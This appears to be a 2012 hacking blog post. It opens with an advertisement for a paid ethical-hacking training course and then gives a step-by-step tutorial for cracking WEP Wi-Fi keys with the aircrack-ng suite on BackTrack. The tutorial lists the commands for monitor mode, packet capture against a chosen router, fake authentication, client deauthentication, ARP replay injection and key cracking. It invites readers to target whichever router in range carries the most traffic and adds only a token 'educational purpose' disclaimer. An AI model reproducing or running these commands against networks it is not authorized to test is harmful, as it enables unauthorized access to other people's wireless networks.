For the hacking newbies, Metasploit is the mother of all exploits. It is known as the best hacking tool and it is used by a lot of penetration testers. We won't hesitate to give you full knowledge on networking in our information security trainings.
We are your friends and we want you to join the world of developers and mind benders. Follow http://facebook.com/themindbenders on facebook.
We will include training kits for you including a different CD that includes training, ethical hacking tools, and much more.
and our training kits are highly comprehensive.
Do not miss the chance today. Click HERE and it is all yours.
For more info, contact
9999921380 For Indians
08128130440 For Nigerians
For other countries, just click the link given. Here it is again http://www.innobuzz.in/ebs/referral/5595  



Wednesday, 14 November 2012

Hack WEP in 5 mins !! (BackTrack)





Open shell console and type in:

airmon-ng start wlan0

it will say that monitor mode has started on mon0 or mon1 or mon whatever. then type clear to clear that data.

airodump-ng mon0 (or whatever monitoring mode started on)

it will give you a list of wireless routers that are in range of your computer. pick the one with the most data currently going on for fastest results.

airodump-ng -w (filename u want to use) -c (channel the router is on) --bssid (the bssid) mon0

Then it will start packet inj, then you quickly open a new shell console.

aireplay-ng -1 0 -a (the bssid) mon0

new shell console

aireplay-ng -0 5 -a (the bssid) mon0

new shell console 

aireplay-ng -3 -b (the bssid) mon0

at this point your data per second should be around 100-500 per second and then just wait until the data reaches 40,000

when it does you can hold control and hit C on all the shell consoles to stop the commands.

Open a new shell console or use one already up and type in dir. this will show you the name of the file (the -w (filename)) in case you have forgotten what you named it. It will be a .cap file

Then type aircrack-ng (file name)

For example: aircrack-ng bobsrouter-01.cap

aircrack will say key found! and then you just copy the info down.

This is only for educational purpose... 
PrinceMahen
